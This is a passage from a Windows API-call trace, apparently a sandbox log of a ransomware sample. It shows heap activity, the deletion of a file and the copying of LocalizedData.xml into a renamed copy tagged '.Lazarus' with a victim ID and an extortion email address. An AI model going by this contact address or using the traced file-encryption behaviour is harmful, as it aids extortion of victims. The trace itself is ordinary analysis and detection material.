lpOverlapped=0x0) returned 1 [0068.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d648 | out: hHeap=0x20000) returned 1 [0068.710] CloseHandle (hObject=0x420) returned 1 [0068.710] AreFileApisANSI () returned 1 [0068.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69490 [0068.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 36 [0068.710] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf")) returned 1 [0068.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0068.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0068.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0068.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0068.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b798 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.712] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0068.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0068.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0068.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0068.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0068.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0068.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0068.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0068.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0068.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0068.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0068.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.713] AreFileApisANSI () returned 1 [0068.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0068.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0068.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0068.713] AreFileApisANSI () returned 1 [0068.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71bd0 [0068.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 45 [0068.714] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.714] GetFileType (hFile=0x420) returned 0x1 [0068.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0068.714] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0068.714] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0068.714] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0068.714] CloseHandle (hObject=0x420) returned 1 [0068.714] AreFileApisANSI () returned 1 [0068.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0068.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 45 [0068.715] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.715] GetFileType (hFile=0x420) returned 0x1 [0068.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0068.715] CloseHandle (hObject=0x420) returned 1 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0068.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.716] AreFileApisANSI () returned 1 [0068.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0068.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 45 [0068.716] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712)) returned 1 [0068.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0068.716] AreFileApisANSI () returned 1 [0068.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0068.716] GetLastError () returned 0x0 [0068.716] SetLastError (dwErrCode=0x0) [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0068.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0068.716] GetLastError () returned 0x0 [0068.717] SetLastError (dwErrCode=0x0) [0068.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0068.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71a98 [0068.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0068.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0068.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0068.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0068.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0068.717] AreFileApisANSI () returned 1 [0068.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0068.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0068.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0068.717] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.717] GetFileType (hFile=0x420) returned 0x1 [0068.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0068.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0068.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0068.718] AreFileApisANSI () returned 1 [0068.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0068.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 45 [0068.718] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.718] GetFileType (hFile=0x410) returned 0x1 [0068.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0068.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0068.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0068.719] GetLastError () returned 0x0 [0068.719] SetLastError (dwErrCode=0x0) [0068.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0068.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0068.719] GetLastError () returned 0x0 [0068.719] SetLastError (dwErrCode=0x0) [0068.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0068.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0068.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0068.719] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0068.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0068.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0068.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0068.721] GetLastError () returned 0x0 [0068.721] SetLastError (dwErrCode=0x0) [0068.721] GetLastError () returned 0x0 [0068.721] SetLastError (dwErrCode=0x0) [0068.722] GetLastError () returned 0x0 [0068.722] SetLastError (dwErrCode=0x0) [0068.722] GetLastError () returned 0x0 [0068.722] SetLastError (dwErrCode=0x0) [0068.722] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.722] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.723] GetLastError () returned 0x0 [0068.723] SetLastError (dwErrCode=0x0) [0068.723] GetLastError () returned 0x0 [0068.723] SetLastError (dwErrCode=0x0) [0068.724] GetLastError () returned 0x0 [0068.724] SetLastError (dwErrCode=0x0) [0068.724] GetLastError () returned 0x0 [0068.724] SetLastError (dwErrCode=0x0) [0068.724] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.724] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.724] GetLastError () returned 0x0 [0068.724] SetLastError (dwErrCode=0x0) [0068.724] GetLastError () returned 0x0 [0068.724] SetLastError (dwErrCode=0x0) [0068.724] GetLastError () returned 0x0 [0068.725] SetLastError (dwErrCode=0x0) [0068.725] GetLastError () returned 0x0 [0068.725] SetLastError (dwErrCode=0x0) [0068.725] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.725] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.725] GetLastError () returned 0x0 [0068.725] SetLastError (dwErrCode=0x0) [0068.725] GetLastError () returned 0x0 [0068.725] SetLastError (dwErrCode=0x0) [0068.725] GetLastError () returned 0x0 [0068.725] SetLastError (dwErrCode=0x0) [0068.725] GetLastError () returned 0x0 [0068.726] SetLastError (dwErrCode=0x0) [0068.726] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.726] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.726] GetLastError () returned 0x0 [0068.726] SetLastError (dwErrCode=0x0) [0068.726] GetLastError () returned 0x0 [0068.726] SetLastError (dwErrCode=0x0) [0068.726] GetLastError () returned 0x0 [0068.726] SetLastError (dwErrCode=0x0) [0068.726] GetLastError () returned 0x0 [0068.726] SetLastError (dwErrCode=0x0) [0068.726] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.727] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.727] GetLastError () returned 0x0 [0068.727] SetLastError (dwErrCode=0x0) [0068.727] GetLastError () returned 0x0 [0068.727] SetLastError (dwErrCode=0x0) [0068.727] GetLastError () returned 0x0 [0068.727] SetLastError (dwErrCode=0x0) [0068.727] GetLastError () returned 0x0 